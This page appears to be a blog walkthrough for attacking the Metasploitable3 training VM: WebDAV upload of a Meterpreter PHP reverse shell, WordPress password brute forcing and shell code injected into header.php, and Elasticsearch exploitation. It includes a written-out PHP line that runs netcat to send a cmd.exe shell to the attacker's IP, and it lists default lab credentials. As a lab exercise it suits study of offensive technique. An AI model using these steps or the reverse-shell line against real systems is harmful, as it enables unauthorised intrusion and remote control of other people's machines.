Exploiting Port 8585 – WebDAV
There are multiple services running on this single port.
Web Distributed Authoring and Versioning is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. In Metasploitable3, the uploads directory looks promising and for now it is completely empty:
Enumerating WebDAV using Directory Buster
Directory Buster (dirb) is a nice tool that brute forces directories on a webserver.
Now you can use several methods to determine if you’re allowed to upload files to this directory with the HTTP PUT method
Enumerating WebDAV using Nmap
As you can see, the webserver allows you to upload files to the uploads directory and even delete files.
Enumerating WebDAV using Nikto
You can also use this web vulnerability scanner to identify features in the webserver. If the HTTP PUT method is enabled than Nikto will indicate this as following:
The last line of Nikto output indicates that the uploads directories allows uploading files using HTTP PUT.
Enumerating WebDAV using Metasploit
Using Metasploit you can also do WebDav Enumeration.
As you can see, the uploads directory is writable and a number of different file formats can be uploaded over there.
Exploiting WebDAV
Uploading a payload to WebDAV
Now that you know that you can upload files to the server, the next step is creating a Meterpreter PHP reverse shell script to be deployed to the webserver. Create the scripts with these parameters:
- Kali IP: 172.16.1.6
- Kali port: 5555
Now setup a listener to receive the incoming connection choosing the correct payload:
Now you have multiple options to deploy the payload to the target machine.
Exploiting WebDAV using Nmap
Nmap has a script created exactly to take advantage of the HTTP PUT method. Because port 8585 is not defined as an HTTP service port in the Nmap services file it is fundamental that you run a service scan with the -sV flag. Otherwise, the script will fail in uploading the file and will only display an open port and unknown service.
Now, if you browse the uploads directory and click on the payload.php file you will get a meterpreter shell:
This is low privilege shell, but it’s a start.
Before you try some other deployment methods, close the meterpreter session and remove the previous payload from the WebDAV server using curl:
Exploiting WebDAV using Metasploit
You can also use the Metasploit auxiliary module HTTP PUT to upload a file to the uploads web directory. Use the previously created payload:
Metasploit is showing us that the upload has failed, but when we check the uploads directory on the webserver we can see that the file upload did go through.
Setup the same listener as before and repeat the same procedure of browsing and clicking the payload on the target server.
Exploiting WebDAV using curl
You can also upload the payload using curl:
Exploiting WebDAV using cadaver
Finally, you can also use cadaver to upload the file:
Exploiting Port 8585 – Wordpress
From the start page, if you click on the wordpress link under Your Projects you will see the WordPress website running on the target server.
The link to the login page will take you to /wordpress/wp-login.php
You already have the credentials because you’ve managed to crack the hashes before, remember? Anyway, forget about that and try to get them again.
Brute forcing Wordpress using Nmap
Use your customized wordlists to speed up the process
You have found four valid sets of credentials.
Brute forcing Wordpress using Metasploit
Brute forcing Wordpress using WPScan
WPscan is a powerful tool that can also be used to brute force the access to a WordPress website:
Now, with a valid login you can access the admin page:
Try to get as much information as possible about your target:
Enumerating Wordpress using Nmap
Important information: the installed plugins…
NOTE: Pay attention to the syntax of the NSE scripts.
Enumerating Wordpress using WPScan
This is supposed to be the ultimate tool when it comes to getting information about any WordPress site:
Enumerating Wordpress using Metasploit
This module will enumerate the existing users and then it will check for valid credentials.
Exploiting Wordpress
You can login to the website but what you want is a shell, right? In WordPress you can’t deploy files to the website but you can add code to the existing pages.
Login to WordPress either using admin/sploit or vagrant/vagrant and open the Appearance > Editor
On the right side, select a PHP file preferably header.php.
You will see the PHP code for that page:
Exploiting Wordpress using Metasploit
To open a meterpreter shell, create a proper payload wit MSFVenom:
Open the generated payload and adjust the code uncommenting the beginning and adding the proper closing PHP tag at the end:
Now insert this code at the top of the header.php code editor:
Press the Update File button
Now, setup a listener on the Kali machine, ready to receive the incoming connection:
Go back to your browser and reload the WordPress homepage:
And you have a shell to the target machine
Enumerating Wordpress using Netcat
If the target machine has Netcat or a similar tool installed, it can be used to open a simple reverse shell.
Add the following code to the page, using Kali’s IP and listener port:
<?php echo shell_exec(“nc.exe 172.16.1.6 5555 -e cmd.exe”); ?>
Press the Update File button
Now setup a Netcat listener on Kali:
Now, reloading the WordPress homepage on the browser will run the Netcat or clone command and a reverse connection to Kali will be created.
Exploiting Port 9200 – Elastic Search
Elasticsearch is a real-time distributed and open source full-text search and analytics engine and is known to have a couple of Remote Code Execution vulnerabilities. Start by accessing Metasploitable3’s IP address over port 9200:
Enumerating Elastic Search using Metasploit
There is a Metasploit module to get information about the service:
You can even get files from the target machine:
Exploiting using Metasploit
Metasploit also has a module to exploit a vulnerability present in this version (1.1.1) of the service:
Next post: Metasploitable 3 Ubuntu Walkthrough: Part I
No comments:
Post a Comment